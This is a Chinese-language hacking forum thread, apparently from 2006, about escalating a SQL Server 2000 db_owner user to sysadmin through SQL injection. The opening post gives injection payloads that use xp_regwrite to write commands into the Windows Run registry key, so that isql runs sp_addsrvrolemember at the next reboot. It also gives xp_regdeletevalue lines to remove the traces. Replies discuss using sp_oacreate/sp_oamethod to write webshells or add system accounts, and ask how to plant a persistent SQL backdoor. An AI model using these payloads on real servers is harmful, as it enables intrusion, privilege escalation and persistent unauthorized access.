议题作者：pt007
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

利用xp_regwrite与xp_regread将SQl用户test1提升为sysadmin用户（即dbo),机器重启后就是数据库管理员权限了:
1);EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','help1','REG_SZ','cmd.exe /c echo EXEC sp_addsrvrolemember test1, sysadmin >c:\test.qry'--
2);EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','help2','REG_SZ','cmd.exe /c isql -E /U alma /P /i c:\test.qry'--
需要重启系统才能成功的利用。
删除help1和help2键值：
1);EXEC master.dbo.xp_regdeletevalue  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','help1'
2);EXEC master.dbo.xp_regdeletevalue  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','help2'

   我在本机上试验成功,本机的环境是win2003+SQL2000,test1用户为db_owner权限,但是利用它在公网主机上做试验却没有一个能成功,请问一下DB_OWNER权限用户有没有执行xp_regwrite写命令到注册表启动项的权限?
  另外听说可以利用LOG备份二进制程序到启动文件夹里面以实现提权功能,具体应该如何实现?

知道答案了,在master中有db_owner权限的情况下,我们可以有权限使用xp_regwrite,甚至可以执行sp_oacreate及sp_oamethod吧，利用sp_oacreate，sp_oamethod我们可以说是无所不能，你可以用来写个webshell甚至直接加个系统帐号。而且利用sp_oacreate及sp_oamethod写出来的webshell可是没有乱码的.也就是说如果有master的db_owner权限,我们就能获得系统的管理员权限.
问题已经解决了,管理员来处理一下吧

db_owner权限不是默认就有xp_regwrite的权利么？？
越看越糊涂了。。
楼主详细的讲解下撒

缺省安装情况下给一般用户对master具有public的权限,需要SA用户赋予一般用户为master的db_owner才能正确执行xp_regwrite存储过程,使用xp_regread只需要public权限行了

貌似CMD下没有写入权限,要怎么弄呢?

[s:75] 老题新做，跟以前的那个加系统帐户差不多。许文强的那个哈哈~~~，pt007只是把内容换了一下，换成命令行下加SYSADMIN用户滴~ [s:82]

引用:

这里是引用第[5 楼]的hack520于2006-03-26 06:14发表的：
[s:75] 老题新做，跟以前的那个加系统帐户差不多。许文强的那个哈哈~~~，pt007只是把内容换了一下，换成命令行下加SYSADMIN用户滴~ [s:82]

我这个是请教的态度,许文强的那个是装B,别拿我和那种人比啊,HEHE

其实我们可以换个角度来考虑这个问题,可以利用这个漏洞来留下SQL的后门,指定一般数据库用户具有master库的DB_OWNER权限,请问如何用SQL语句来实现这个功能?